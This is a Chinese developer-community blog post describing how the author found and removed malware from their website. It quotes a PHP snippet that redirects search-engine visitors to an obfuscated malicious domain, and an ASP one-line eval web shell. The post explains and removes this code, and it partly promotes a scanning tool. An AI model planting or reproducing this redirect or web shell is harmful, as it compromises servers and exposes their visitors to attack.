开发者社区> 网站安全> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

放假期间网站被挂马的解决办法

简介: 放假期间网站被挂马的解决办法 青岛峰会期间本来想给自己放几天假的,因为网站的挂马给泡汤了,打开网站首页,使用浏览器的源代码功能,发现自己网站的首页多了很多木马代码,于是我连接FTP查看网站首页的代码中发现了这个挂马代码...
+关注继续查看

放假期间网站被挂马的解决办法

青岛峰会期间本来想给自己放几天假的,因为网站的挂马给泡汤了,打开网站首页,使用浏览器的源代码功能,发现自己网站的首页多了很多木马代码,于是我连接FTP查看网站首页的代码中发现了这个挂马代码,下面我把代码贴出来 :

<?phperror_reporting(0);if(eregi('google|soso|sogou|baidu',$_SERVER['HTTP_REFERER']) ){ echo '<>window.location.href="http://www."+"tao"+"8s"+".in"+"fo";</>';}

恶意的挂马网址 www.tao8s.info

解释一下:这个代码是 PHP的代码是一种条件性的挂马,上面的google soso sogou baidu 都是挂马的条件,意思就是当从 google soso...等等搜索引擎来的访问客户会自动在网页上隐藏一行代码也就是挂马代码。

访问这个网站的用户,一般都会被360和百度提示网站有风险和网站挂马提示的,但是这个挂马为什么不提示呢? 这里我给大家解密下,不要以为病毒都会被杀毒软件杀掉,杀毒软件也不是万能的,就像警察抓小偷,警察不知道小偷的特征怎么去抓捕呢? 杀毒和这个道理一样的是根据特征来的,有一些病毒出来的早,没有被杀毒跟踪到,所以360和百度也不会有什么安全挂马提示(一般业界人士称“免杀病毒”。

说的有点多,言归正传。说点干货,那遇到这种情况咋办啊,我的解决办法就是先查清楚病因后除根,于是用FTP把网站程序全部打包下来然后一个一个文件的检查,看看有没有其他名字的文件,我在网上查到一般木马文件名字都是global.asa global.asp 啥的,反正是些不熟悉的文件名,检查了一下没有发现特殊的文件名字,于是开始检查代码方面,都知道程序员写代码能累死,于是在百度上查到了一个叫sinesafe的网站挂马代码检查工具,这个工具是专门检查挂马代码的和木马代码的。我把网站程序的代码文件放到工具检测了一下,发现了木马代码 <%eval request("hack")%> eval的特征代码,找到这个代码后我就给删除了,重复的用挂马检测工具检查了好几遍,没有发现问题后,我这才放心。连接到FTP,把网站程序重新上传了一遍,网站这才稳定下来。

折腾了我一天,连午睡都没捞着睡,困死我了。以上就是我网站被挂马后的解决经历,有什么不懂的也随时欢迎大家与我交流探讨。


版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
线上 RTT 过长,我用这一招解决了!
线上 RTT 过长,我用这一招解决了!
0 0
险些没过试用期的二狗,他回来了!
Hi!各位读者老爷! 我王二狗又回来了!
0 0
沙箱报错:系统有点儿忙,一会儿再试试
说明 沙箱有定期维护,维护期间如果测试会报错。临时维护也会有类似报错,敬请谅解。  沙箱公告 说明(如下图)访问地址:[url]https://openhome.alipay.com/platform/appDaily.htm?tab=info[/url] 沙箱维护时间 每周日中午12点至每周一中午12点沙箱环境进行维护,期间可能出现不可用。
140 0
放假期间网站被挂马的解决办法
青岛峰会期间本来想给自己放几天假的,因为网站的挂马给泡汤了,打开网站首页,使用浏览器的源代码功能,发现自己网站的首页多了很多木马代码,于是我连接FTP查看网站首页的代码中发现了这个挂马代码,下面我把代码贴出来 :
1426 0
网站被挂马实用怎么解决的办法之一
 最近单位网站在百度搜索点击打开都是黄色的,而直接输入网址反而没问题,在百度搜索中被提示为网站被黑的可能,很多客户搜索我们网站都进入了黄色网站,给公司的形象造成了很大的影响,作为公司的网站技术人员,以前也算是搞了5年的老站长了,什么事没惊着,从头开始分析网站被黑的原因。
1345 0
找到 OSChina 早上 8 点钟容易宕机的原因 ?
最近一段时间,OSChina 网站在早上 8 点出头的时候很容易因为数据库连接池爆满而导致网站宕机。表现的情况是数据库处理大量的查询,堆积大量并发连接,导致无法再连接到数据库,执行一个简单的查询速度也非常慢,数据库机器的 CPU 很高。
812 0
在新东家工作了1328天,明天回老东家
在新东家工作了1328天,明天回老东家
650 0
艾伟:一次挂死(hang)的处理过程及经验
前言:        CPU占用率低,内存还有许多空余,但网站无法响应,这就是网站挂死,通常也叫做hang。这种情况对于我这样既是CEO,又是CTO,还兼职扫地洗碗的个人站长来说根本就是家常便饭。以下是一次处理hang的经验及总结,前后用了一个月,不仅涉及程序排查,数据库优化,还有硬件升级的苦恼。
778 0
艾伟_转载:一次挂死(hang)的处理过程及经验
前言:        CPU占用率低,内存还有许多空余,但网站无法响应,这就是网站挂死,通常也叫做hang。这种情况对于我这样既是CEO,又是CTO,还兼职扫地洗碗的个人站长来说根本就是家常便饭。以下是一次处理hang的经验及总结,前后用了一个月,不仅涉及程序排查,数据库优化,还有硬件升级的苦恼。
926 0
+关注
网站安全
Sinesafe专注于网站安全,服务器安全,解决各类网络安全问题,对代码审计以及漏洞修补安全加固有专业的十年实战经验.官方站点www.sinesafe.com
文章
问答
文章排行榜
最热
最新
相关电子书
更多
低代码开发师(初级)实战教程
立即下载
阿里巴巴DevOps 最佳实践手册
立即下载
冬季实战营第三期:MySQL数据库进阶实战
立即下载